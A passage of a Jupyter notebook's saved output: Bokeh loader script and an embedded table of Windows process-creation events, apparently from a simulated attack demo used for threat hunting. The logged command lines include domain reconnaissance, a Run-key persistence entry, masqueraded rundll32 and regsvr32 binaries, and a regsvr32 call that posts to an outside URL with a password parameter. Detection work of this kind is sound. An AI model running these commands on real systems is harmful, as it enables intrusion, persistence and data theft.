(output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"
    \\n\"+\n \"
  • re-rerun `output_notebook()` to attempt to load from CDN again, or
    • \\n\"+\n \"
  • use INLINE resources instead, as so:
    • \\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1001\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };var element = document.getElementById(\"1001\");\n if (element == null) {\n console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n return false;\n }\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.3.4.min.js\"];\n var css_urls = [];\n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n \n function(Bokeh) {\n \n },\n function(Bokeh) {} // ensure no trailing comma for IE\n ];\n\n function run_inline_js() {\n \n if ((root.Bokeh !== undefined) || (force === true)) {\n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n \n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"
    \\n\"+\n \"
  • re-rerun `output_notebook()` to attempt to load from CDN again, or
    • \\n\"+\n \"
  • use INLINE resources instead, as so:
    • \\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1001\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };var element = document.getElementById(\"1001\");\n if (element == null) {\n console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n return false;\n }\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.3.4.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.3.4.min.js\"];\n var css_urls = [];\n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n \n function(Bokeh) {\n \n },\n function(Bokeh) {} // ensure no trailing comma for IE\n ];\n\n function run_inline_js() {\n \n if ((root.Bokeh !== undefined) || (force === true)) {\n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\n\n\n\n\n\n
\n" }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"4eec22b6-251a-4358-b905-989e6c838545\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1123\",\"type\":\"Row\"},{\"id\":\"1121\",\"type\":\"DataTable\"}]},\"id\":\"1124\",\"type\":\"Column\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1103\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1136\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1090\",\"type\":\"HelpTool\"},{\"attributes\":{\"callback\":null,\"end\":6,\"start\":1},\"id\":\"1006\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1137\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1138\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1105\",\"type\":\"BoxAnnotation\"},\"x_range\":null,\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"}},\"id\":\"1104\",\"type\":\"RangeTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1104\",\"type\":\"RangeTool\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1085\",\"type\":\"PanTool\"},{\"id\":\"1086\",\"type\":\"WheelZoomTool\"},{\"id\":\"1087\",\"type\":\"BoxZoomTool\"},{\"id\":\"1088\",\"type\":\"SaveTool\"},{\"id\":\"1089\",\"type\":\"ResetTool\"},{\"id\":\"1090\",\"type\":\"HelpTool\"},{\"id\":\"1104\",\"type\":\"RangeTool\"}]},\"id\":\"1091\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1139\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1140\",\"type\":\"StringEditor\"},{\"attributes\":{\"ticks\":[1,2,3]},\"id\":\"1062\",\"type\":\"FixedTicker\"},{\"attributes\":{\"grid_line_color\":null,\"ticker\":{\"id\":\"1076\",\"type\":\"BasicTicker\"}},\"id\":\"1079\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1141\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"navy\"},\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[2,2],\"line_width\":{\"value\":0.5}},\"id\":\"1105\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"editor\":{\"id\":\"1130\",\"type\":\"StringEditor\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1109\",\"type\":\"DateFormatter\"},\"title\":\"TimeGenerated\"},\"id\":\"1110\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1142\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1134\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1133\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserSid\"},\"id\":\"1113\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1143\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1061\",\"type\":\"CDSView\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1109\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1132\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1131\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserName\"},\"id\":\"1112\",\"type\":\"TableColumn\"},{\"attributes\":{\"columns\":[{\"id\":\"1110\",\"type\":\"TableColumn\"},{\"id\":\"1112\",\"type\":\"TableColumn\"},{\"id\":\"1113\",\"type\":\"TableColumn\"},{\"id\":\"1114\",\"type\":\"TableColumn\"},{\"id\":\"1115\",\"type\":\"TableColumn\"},{\"id\":\"1116\",\"type\":\"TableColumn\"},{\"id\":\"1117\",\"type\":\"TableColumn\"},{\"id\":\"1118\",\"type\":\"TableColumn\"},{\"id\":\"1119\",\"type\":\"TableColumn\"},{\"id\":\"1120\",\"type\":\"TableColumn\"}],\"height\":150,\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"view\":{\"id\":\"1122\",\"type\":\"CDSView\"},\"width\":950},\"id\":\"1121\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1058\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1059\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1061\",\"type\":\"CDSView\"}},\"id\":\"1060\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1098\",\"type\":\"Dodge\"},{\"attributes\":{\"editor\":{\"id\":\"1136\",\"type\":\"StringEditor\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1135\",\"type\":\"StringFormatter\"},\"title\":\"SubjectLogonId\"},\"id\":\"1114\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringFormatter\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1055\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}}},\"id\":\"1059\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1014\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1018\",\"type\":\"Grid\"},{\"id\":\"1023\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1019\",\"type\":\"LinearAxis\"}],\"outline_line_color\":{\"value\":null},\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1039\",\"type\":\"GlyphRenderer\"},{\"id\":\"1046\",\"type\":\"GlyphRenderer\"},{\"id\":\"1053\",\"type\":\"GlyphRenderer\"},{\"id\":\"1060\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1004\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1028\",\"type\":\"Toolbar\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"x_scale\":{\"id\":\"1010\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1012\",\"type\":\"LinearScale\"}},\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"editor\":{\"id\":\"1138\",\"type\":\"StringEditor\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1137\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessId\"},\"id\":\"1115\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1140\",\"type\":\"StringEditor\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1139\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessName\"},\"id\":\"1116\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1154\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"formatter\":{\"id\":\"1154\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1076\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1075\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1142\",\"type\":\"StringEditor\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1141\",\"type\":\"StringFormatter\"},\"title\":\"CommandLine\"},\"id\":\"1117\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1073\",\"type\":\"LinearScale\"},{\"attributes\":{\"editor\":{\"id\":\"1144\",\"type\":\"StringEditor\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1143\",\"type\":\"StringFormatter\"},\"title\":\"ProcessId\"},\"id\":\"1118\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"lightgrey\"},\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[4,4],\"line_width\":{\"value\":2},\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1156\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"editor\":{\"id\":\"1146\",\"type\":\"StringEditor\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1145\",\"type\":\"StringFormatter\"},\"title\":\"ParentProcessName\"},\"id\":\"1119\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1076\",\"type\":\"BasicTicker\"},{\"attributes\":{\"editor\":{\"id\":\"1148\",\"type\":\"StringEditor\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1147\",\"type\":\"StringFormatter\"},\"title\":\"TargetLogonId\"},\"id\":\"1120\",\"type\":\"TableColumn\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1122\",\"type\":\"CDSView\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1024\",\"type\":\"PanTool\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":null,\"ticker\":{\"id\":\"1081\",\"type\":\"BasicTicker\"}},\"id\":\"1084\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1152\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1081\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1080\",\"type\":\"LinearAxis\"},{\"attributes\":{\"children\":[{\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"id\":\"1066\",\"subtype\":\"Figure\",\"type\":\"Plot\"}]},\"id\":\"1123\",\"type\":\"Row\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"BasicTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1098\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1101\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1133\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1098\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1100\",\"type\":\"Rect\"},{\"attributes\":{\"callback\":null,\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"CommandLine\":[\"NaN\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 3\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"net user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"cmd /c echo End Security Demo tasks\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe zip archive.mdb\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe \\\"http://www.401k.com/upload?pass=34592389\\\" post\",\"tasklist\",\"net localgroup Administrators\",\"whoami\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"HOSTNAME.EXE\",\"NETSTAT.EXE\",\"net.exe\",\"net.exe\",\"net.exe\",\"reg.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"rundll32.exe\",\"regsvr32.exe\",\"tasklist.exe\",\"net.exe\",\"whoami.exe\"],\"IsBranch\":[false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"IsLeaf\":[false,false,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3],\"NewProcessId\":[\"0x498\",\"0x12f4\",\"0x6dc\",\"0x6e8\",\"0xd98\",\"0xfe4\",\"0x2f0\",\"0x18c\",\"0x13a0\",\"0x10dc\",\"0x114c\",\"0xfa4\",\"0x1164\",\"0x12b0\",\"0x1150\",\"0xdd4\",\"0xc34\",\"0xc64\"],\"NewProcessId1\":[\"NaN\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"NewProcessId_par\":[\"NaN\",\"0x498\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\W!ndows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\rundll32.exe\",\"C:\\\\W!ndows\\\\System32\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W